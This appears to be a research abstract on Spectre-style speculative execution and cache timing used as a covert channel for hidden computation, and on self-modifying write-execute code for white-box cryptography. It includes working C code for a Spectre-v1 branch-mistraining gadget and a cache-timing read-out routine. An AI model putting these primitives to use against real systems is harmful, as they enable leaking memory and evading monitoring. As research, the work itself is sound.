Self-spectre, write-execute and the hidden state

Gregory Morse


The recent Meltdown and Spectre vulnerabilities have highlighted a very real and present threat in on-chip memory cache units, which can ultimately provide a hidden state, albeit one readable only through memory timing measurements \cite{DBLP:journals/corr/abs-1801-01203}.  Although the exploits involve some complexity and slowness, they are demonstrably reliable on nearly all processors produced over the last two decades.

Moving beyond viewing this strictly as a means of reading protected memory, as the large microprocessor manufacturers move to close this security vulnerability, an interesting question arises: could the inherent design of the processor allow arbitrary calculations to be hidden in this speculative and parallel side channel?  Without even touching protected memory or exploiting the vulnerability, as has been the focus so far, there could well be a whole class of techniques which exploit the side channel.  Such behavior would be largely unpreventable, as countermeasures would either become self-defeating or require a more complicated and expensive on-chip cache memory system that properly cleans itself after mis-speculation.  Given hardware limitations, the ability to train the branch predictor into incorrect speculative behavior is almost certain, and it provides exactly this pathway.
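The mistraining pathway itself needs nothing exotic.  A minimal sketch in C, assuming a Spectre-v1-style bounds-check gadget (the names `victim` and `train_and_trigger` are hypothetical), shows the pattern: repeated in-bounds calls bias the predictor toward the taken branch, so a final out-of-bounds call executes the body speculatively even though it is architecturally rejected.

```c
#include <stddef.h>
#include <stdint.h>

#define ARRAY_LEN 16
uint8_t array[ARRAY_LEN];
uint8_t probe[256 * 64];        /* one cache line per possible byte value */

/* A volatile bound keeps the compiler from removing the check. */
volatile size_t array_len = ARRAY_LEN;

/* Returns 1 when the body runs architecturally, 0 otherwise. */
int victim(size_t i)
{
    if (i < array_len) {        /* predicted taken after training */
        /* Executed architecturally when in bounds; executed only
         * speculatively (leaving a cache footprint) when i is out
         * of bounds and the branch is mispredicted. */
        (void)probe[array[i] * 64];
        return 1;
    }
    return 0;
}

void train_and_trigger(size_t oob_index)
{
    /* Train: many in-bounds calls bias the predictor toward "taken". */
    for (int t = 0; t < 30; t++)
        victim((size_t)t % ARRAY_LEN);
    /* Trigger: the out-of-bounds call is speculatively taken. */
    victim(oob_index);
}
```

Whether the speculative access actually lands in the cache depends on the microarchitecture, but no privilege or protected memory is involved at any point.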

A novel approach looks at just how much computation can be done speculatively, with results stored via indirect reads and made available through the memory cache.  A multi-threaded approach allows a multi-stage computation pipeline in which each result is passed to a read-out thread and then on to the next computation thread \cite{Swanson:2003:ESI:859716.859720}.  Through channels like this, an application can surreptitiously perform arbitrary calculations, or even leak data, without standard tracing tools being capable of monitoring the subtle changes.  Like a variation of Heisenberg's famous uncertainty principle in physics, even a tool capable of reading the cache states would not only be incredibly inefficient but would itself tamper with and modify the state.  Tools such as in-circuit emulators, or specially designed cache emulators, would be needed to unmask the speculative reads, which are moreover difficult to visualize on a linear timeline.
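The read-out stage of such a pipeline can be sketched as follows (again a sketch assuming x86-64 intrinsics; `read_out` and the one-page-per-value layout are illustrative choices): the computing stage leaves its result as a single warm line among 256 candidates, and the read-out stage recovers the value purely by timing, with no direct data transfer.

```c
#include <stdint.h>
#include <x86intrin.h>  /* __rdtscp */

#define STRIDE 4096     /* one page per value, to sidestep line prefetch */
static uint8_t channel[256 * STRIDE];

static uint64_t access_time(volatile uint8_t *p)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}

/* The computing stage touches channel[v * STRIDE] for its result v;
 * this stage recovers v as the index of the fastest-loading line. */
int read_out(void)
{
    int best = 0;
    uint64_t best_t = UINT64_MAX;
    for (int v = 0; v < 256; v++) {
        /* Visit values in a permuted order to confuse the prefetcher. */
        int k = (v * 167 + 13) & 255;
        uint64_t t = access_time(&channel[(size_t)k * STRIDE]);
        if (t < best_t) { best_t = t; best = k; }
    }
    return best;
}
```

In the multi-threaded pipeline described above, one such scan per stage hands the recovered byte to the next computation thread.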

Another approach, similar to genetic programming, is presented, showing that when read access to both memory and registers is forbidden in code, writing and execution still proceed as expected \cite{Nordin95evolvingturing-complete}, enough to carry out arbitrary computations via self-modifying code.  Its ease of implementation and translation, along with a methodology for building a framework around it, is demonstrated.  Various techniques are possible, including predefined instructions with write pathways forming a chain of computation, or changing instruction opcodes to category equivalents to represent decisions.  In this case, the program itself is the state which indirectly hides its data.

Specifically, the AES and RSA algorithms are studied with respect to these ideas, measuring success rates for various calculation batches under speculative execution, together with a summary view of the rather severe performance penalties incurred by such methods.

Either approach could provide strong white-box cryptography when considering a binary, non-source-code form.  In terms of white-box methods, both make it significantly challenging to locate the code or deduce its inner workings.  Further, both methods can easily and surreptitiously leak or hide data within shared memory in a seemingly innocuous manner.
